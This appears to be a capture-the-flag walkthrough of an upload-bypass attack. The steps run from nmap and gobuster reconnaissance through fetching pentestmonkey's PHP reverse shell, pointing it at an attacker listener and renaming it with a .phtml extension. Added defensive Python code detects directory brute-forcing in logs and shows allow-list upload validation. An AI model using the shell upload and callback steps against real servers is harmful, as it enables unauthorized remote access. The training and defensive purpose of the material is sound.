TryHackMe Offensive Pentesting Path

August 16, 2022

    Reconnaissance
    • Scan Target:
      • $ nmap -sV 0.0.0.0
        -sV: Probe open ports to determine service/version info
        0.0.0.0: IP address of the target (placeholder; substitute the machine's IP)

      • PORT STATE SERVICE VERSION
        3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
    • Discover Directories
      • $ gobuster dir -u http://0.0.0.0:3333 -w /usr/share/wordlists/dirb/common.txt
        -u: Target URL
        -w: Wordlist

      • DIRECTORY STATUS
        /internal 301
    • Visit URL
      • Target URL Port 3333
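The gobuster step above is loud from the server's side: one client requests hundreds of non-existent paths in seconds. The following detector, added here as an example and not part of the TryHackMe room or of gobuster, parses Apache combined-format access logs and flags any client IP that produces more than a threshold of 404 responses inside a short sliding window. The log lines, IPs and thresholds are constructed sample values.

```python
"""Detect directory brute-forcing from Apache combined-format access logs.

Added example: flags any client that produces more than THRESHOLD 404 responses
within WINDOW_SECONDS. Volume of 404s is the robust signal; a scanner's
User-Agent string can be changed, so it is reported but not relied on.
"""
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format, e.g.
# 10.0.0.5 - - [16/Aug/2022:10:00:00 +0000] "GET /internal HTTP/1.1" 301 314 "-" "gobuster/3.1.0"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)

THRESHOLD = 5        # more than this many 404s from one IP ...
WINDOW_SECONDS = 10  # ... inside a window of this many seconds


def parse_line(line):
    """Parse one combined-format line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%d/%b/%Y:%H:%M:%S %z")
    return {
        "ip": m.group("ip"),
        "ts": ts,
        "path": m.group("path"),
        "status": int(m.group("status")),
        "ua": m.group("ua"),
    }


def find_bruteforcers(lines, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Return {ip: max_404s_in_one_window} for every IP that exceeds the threshold."""
    per_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 404:
            per_ip[rec["ip"]].append(rec["ts"])

    flagged = {}
    for ip, stamps in per_ip.items():
        stamps.sort()
        best, start = 0, 0
        for end in range(len(stamps)):
            # Slide the window start forward until it fits inside `window` seconds.
            while (stamps[end] - stamps[start]).total_seconds() > window:
                start += 1
            best = max(best, end - start + 1)
        if best > threshold:
            flagged[ip] = best
    return flagged


def scanner_user_agents(lines, needle="gobuster"):
    """Secondary signal: IPs whose User-Agent names a known scanner (easily spoofed)."""
    return sorted({r["ip"] for r in map(parse_line, lines) if r and needle in r["ua"].lower()})


# Constructed sample log: one scanner (10.0.0.5) and one ordinary visitor (10.0.0.9).
SAMPLE_LOG = """\
10.0.0.5 - - [16/Aug/2022:10:00:00 +0000] "GET /admin HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [16/Aug/2022:10:00:00 +0000] "GET /backup HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [16/Aug/2022:10:00:01 +0000] "GET /cgi-bin/ HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [16/Aug/2022:10:00:01 +0000] "GET /images HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [16/Aug/2022:10:00:02 +0000] "GET /internal HTTP/1.1" 301 314 "-" "gobuster/3.1.0"
10.0.0.5 - - [16/Aug/2022:10:00:02 +0000] "GET /login HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.5 - - [16/Aug/2022:10:00:03 +0000] "GET /test HTTP/1.1" 404 275 "-" "gobuster/3.1.0"
10.0.0.9 - - [16/Aug/2022:10:00:05 +0000] "GET / HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.9 - - [16/Aug/2022:10:00:30 +0000] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0"
""".splitlines()

if __name__ == "__main__":
    print("404 burst:", find_bruteforcers(SAMPLE_LOG))
    print("scanner UA:", scanner_user_agents(SAMPLE_LOG))
```

On the sample, the scanner is flagged with six 404s in one window while the ordinary visitor's single missing favicon is ignored. Note that the /internal hit returned 301, not 404, so a successful discovery never counts against the threshold; it is the surrounding misses that give the scan away.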

    Compromise Webserver
    • Create a file with a .php extension and attempt to upload it
      • Upload shell.php
    • Create a custom extension list to test which file extensions can be uploaded
      • $ cat phpext.txt
        .php
        .php3
        .php4
        .php5
        .phtml
    • Use Burp Suite to enumerate through extensions and find out which ones are allowed

    • Get PHP Reverse Shell from pentestmonkey
      • $ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

        Modify the '$ip' and '$port' variables to your host machine's IP and the netcat listening port you will use, respectively
        $ip = '127.0.0.1'; // CHANGE THIS
        $port = 1234; // CHANGE THIS
    • Rename the reverse shell file to use an allowed extension
      • $ mv php-reverse-shell.php php-reverse-shell.phtml
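The upload bypass above works because the form only denies the literal ".php" suffix while the PHP handler also executes the other extensions in phpext.txt. The example below, added here and not taken from the room or any upload form, puts that deny-list check beside an allow-list check and runs the write-up's own extension list through both. The allow-list of image and document extensions and the storage-name scheme are assumptions for the demonstration.

```python
"""Deny-list versus allow-list validation of uploaded filenames.

Added example: `weak_is_allowed` is the check the write-up defeats (it blocks
only '.php'); `hardened_is_allowed` accepts only an explicit allow-list and
rejects any executable-extension component; `stored_name` drops the client's
filename entirely so the extension cannot be chosen by the uploader.
"""
import os
import secrets

# The extensions from the write-up's phpext.txt: all may be executed by a PHP-enabled Apache.
PHP_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".phtml"}

# Assumption for this example: the form is meant to accept images and PDFs only.
ALLOWED_UPLOAD_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".pdf"}


def weak_is_allowed(filename):
    """Deny-list check as found on many upload forms: rejects only '.php'."""
    return not filename.endswith(".php")


def hardened_is_allowed(filename):
    """Allow-list check: the final extension (case-folded) must be allowed, and no
    component of the name may be an executable extension."""
    base = os.path.basename(filename)          # ignore any directory component
    parts = base.lower().split(".")
    if len(parts) < 2 or not all(parts):       # no extension, or empty component like 'a..jpg'
        return False
    exts = ["." + p for p in parts[1:]]
    if exts[-1] not in ALLOWED_UPLOAD_EXTENSIONS:
        return False
    return not any(e in PHP_EXTENSIONS for e in exts)


def stored_name(filename):
    """Name the file on disk ourselves: random token plus the validated extension.
    Raises ValueError if the upload would not pass the hardened check."""
    if not hardened_is_allowed(filename):
        raise ValueError("upload rejected: %r" % filename)
    ext = "." + os.path.basename(filename).lower().rsplit(".", 1)[1]
    return secrets.token_hex(16) + ext


def audit_extensions(candidates):
    """For each candidate extension report which checks let 'shell<ext>' through."""
    report = {}
    for ext in sorted(candidates):
        name = "shell" + ext
        report[ext] = {"weak": weak_is_allowed(name), "hardened": hardened_is_allowed(name)}
    return report


if __name__ == "__main__":
    for ext, result in audit_extensions(PHP_EXTENSIONS).items():
        print("%-7s weak=%-5s hardened=%s" % (ext, result["weak"], result["hardened"]))
    print("photo.jpg stored as", stored_name("photo.jpg"))
```

Running the audit shows the deny-list passing four of the five extensions and the allow-list passing none. Validation is only one layer: the upload directory should also have script execution disabled at the web server (for example with Apache's RemoveHandler for the PHP handler, or by storing uploads outside the document root), so that a file which slips past the check is served as data rather than run.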